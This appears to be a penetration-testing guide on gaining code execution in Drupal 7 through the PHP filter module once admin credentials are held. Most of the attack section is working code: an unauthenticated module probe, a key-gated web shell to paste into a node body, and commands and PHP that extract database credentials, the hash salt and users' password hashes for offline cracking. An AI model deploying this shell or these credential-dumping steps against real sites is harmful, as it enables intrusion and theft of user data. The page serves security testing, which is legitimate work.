RCE with Admin Credentials
The PHP filter module lets content authors embed PHP code in node bodies, and the server executes that code when the node is rendered. This is intended behaviour, not a bug in the module: it becomes a remote code execution primitive only once an attacker holds an account with administrative permissions (obtained through credential reuse, a weak password, or a separate vulnerability), because enabling the module and assigning the PHP code text format both require that level of access.
Interesting info about PHP filter
Requirements:
- The PHP filter module present on the application
- Access to an administrator account
How to check which modules are present?
The default path for Drupal core modules is
/modules/<module_name>
Checking whether a module directory exists does not require authentication. Send a GET request to the following path to test for the PHP filter module:
/modules/php

| Response Code | Intel Info |
|---|---|
| 403 Forbidden | Module directory is present (the web server denies directory listing) |
| 404 Not Found | Module directory is absent |

Two caveats apply. A 403 shows that the module's code is deployed (it ships with Drupal 7 core), not that the module is enabled; whether it is enabled is only visible from the Modules page with admin access. Some hosts also answer 403 for every unknown path, so compare the result with a request for a path that cannot exist before trusting a 403.
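The unauthenticated probe, as an added example that is not code from the original page. It assumes the PHP curl extension and a made-up target host (TARGET), and it adds the control-path cross-check so a host that returns 403 for everything is not mistaken for one that has the module directory.

```php
<?php
// Added example (not from the original page): probe Drupal module directories
// without credentials. Assumes the curl extension; TARGET is a placeholder.
const TARGET = 'http://drupal.example.test';   // assumption: replace with the real host

// /modules/php is the PHP filter module directory in Drupal 7 core.
// The control path is made up and must not exist; it detects hosts that
// answer 403 for any unknown path, which would make a 403 meaningless.
const MODULE_PATH  = '/modules/php';
const CONTROL_PATH = '/modules/zz_nonexistent_control_path';

// Send a HEAD request and return the HTTP status code (0 on connection failure).
function http_status(string $url): int {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_NOBODY         => true,   // HEAD: we only need the status line
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,  // a 301 to /modules/php/ is itself a signal
        CURLOPT_TIMEOUT        => 10,
    ]);
    curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return $code;
}

// Apply the 403/404 rule from the table above, but only trust a 403 when the
// control path behaves normally (404).
function verdict(int $moduleCode, int $controlCode): string {
    if ($moduleCode === 404) {
        return 'module directory absent';
    }
    if ($moduleCode === 403 && $controlCode === 404) {
        return 'module directory present (listing denied)';
    }
    if ($moduleCode === 403 && $controlCode === 403) {
        return 'inconclusive: host returns 403 for unknown paths';
    }
    if ($moduleCode === 200 || $moduleCode === 301) {
        return 'module directory present (listing or redirect)';
    }
    return "inconclusive: HTTP $moduleCode";
}

$module  = http_status(TARGET . MODULE_PATH);
$control = http_status(TARGET . CONTROL_PATH);
printf("%s -> %d, control -> %d: %s\n", MODULE_PATH, $module, $control, verdict($module, $control));
```

Run it from the CLI (`php probe.php`); a result of "present" still only tells you the code is on disk, so the enabled/disabled state is confirmed later from the Modules page.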
Performing the RCE
This is the part where admin access is required.
Enabling the PHP filter module and executing code
- Log in to the application with the administrator account
- Navigate to the Modules section, check whether PHP filter is enabled, and tick it if it is disabled
- Press Save configuration, then go to Add content > Basic page (or Article)
- Write the PHP shell code within the Body field
- Select PHP code in the Text format menu and save the node
- STONKS! The code runs with the web server user's privileges every time the node is viewed
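A body to paste into the node, as an added example that is not from the original page. It is a key-gated command shell for the PHP code text format: it assumes Drupal 7's PHP filter (which evaluates `<?php ... ?>` blocks at render time), PHP 5.6 or later for hash_equals, and a made-up per-engagement key in `$key`. The gate keeps ordinary visitors of the node from seeing, or triggering, anything.

```php
<?php
// Added example (not from the original page): node body for the "PHP code"
// text format. Drupal 7's PHP filter evaluates this block when the node is
// rendered, as the web server user.
// Assumption: the key below is made up; set a fresh one per engagement.
$key = 'change-me-8f1c';

// Only run when both a matching key and a command are supplied, e.g.
// /node/<nid>?k=change-me-8f1c&cmd=id . hash_equals() avoids a timing leak
// on the key comparison.
if (isset($_GET['k'], $_GET['cmd']) && hash_equals($key, (string) $_GET['k'])) {
  // Merge stderr into stdout so failures are visible in the page, and
  // HTML-escape the output so command output cannot inject markup.
  $out = shell_exec($_GET['cmd'] . ' 2>&1');
  echo '<pre>' . htmlspecialchars((string) $out, ENT_QUOTES, 'UTF-8') . '</pre>';
}
?>
```

Visiting the saved node without the parameters renders an empty body; with `?k=<key>&cmd=id` it renders the command output inside the page. If the target runs an older PHP without hash_equals, replace the comparison with a strict `===` and accept the timing side channel.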
Post Exploitation
- Read settings.php (database credentials and the site hash salt):
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
- Dump users from the DB (adapt the user, password and database name to what settings.php returned; the pass column holds salted hashes, not plaintext):
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
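The same post-exploitation steps done from inside the PHP filter node, as an added example that is not from the original page. It uses Drupal 7's own API (the global `$databases` array loaded from settings.php, drupal_get_hash_salt(), and db_query()), so it works even when find or a mysql client is not available on the host; it assumes Drupal 7 and the same made-up key gate as the shell above.

```php
<?php
// Added example (not from the original page): read settings.php values and
// dump the users table through Drupal 7's API from a "PHP code" node body.
// Assumptions: Drupal 7 (db_query, drupal_get_hash_salt, $databases);
// the key is made up and should be changed per engagement.
$key = 'change-me-8f1c';

if (isset($_GET['k']) && hash_equals($key, (string) $_GET['k'])) {
  // PHP filter code is eval'd inside a function, so globals must be declared.
  global $databases;
  $default = isset($databases['default']['default']) ? $databases['default']['default'] : array();

  echo '<pre>';
  // Same fields the grep on settings.php pulls out, read from the parsed array.
  foreach (array('driver', 'database', 'username', 'password', 'host', 'port', 'prefix') as $field) {
    $value = isset($default[$field]) ? $default[$field] : '';
    if (is_array($value)) {            // 'prefix' may be a per-table array
      $value = json_encode($value);
    }
    printf("%-9s %s\n", $field . ':', htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8'));
  }
  // The salt used for session and password hashing, from settings.php.
  printf("%-9s %s\n\n", 'salt:', htmlspecialchars(drupal_get_hash_salt(), ENT_QUOTES, 'UTF-8'));

  // Equivalent of "select * from users": {users} gets the table prefix applied.
  // uid 0 is the anonymous placeholder row, so skip it.
  $rows = db_query('SELECT uid, name, pass, mail, status FROM {users} WHERE uid > 0')->fetchAll();
  foreach ($rows as $row) {
    // pass is a salted phpass-style hash ($S$...), not a plaintext password.
    printf("%d %s %s %s active=%d\n",
      $row->uid,
      htmlspecialchars($row->name, ENT_QUOTES, 'UTF-8'),
      htmlspecialchars($row->pass, ENT_QUOTES, 'UTF-8'),
      htmlspecialchars($row->mail, ENT_QUOTES, 'UTF-8'),
      $row->status);
  }
  echo '</pre>';
}
?>
```

The credentials printed here are the ones to plug into the mysql command above if you want a full dump from a shell; the hashes go to an offline cracker rather than being reused directly.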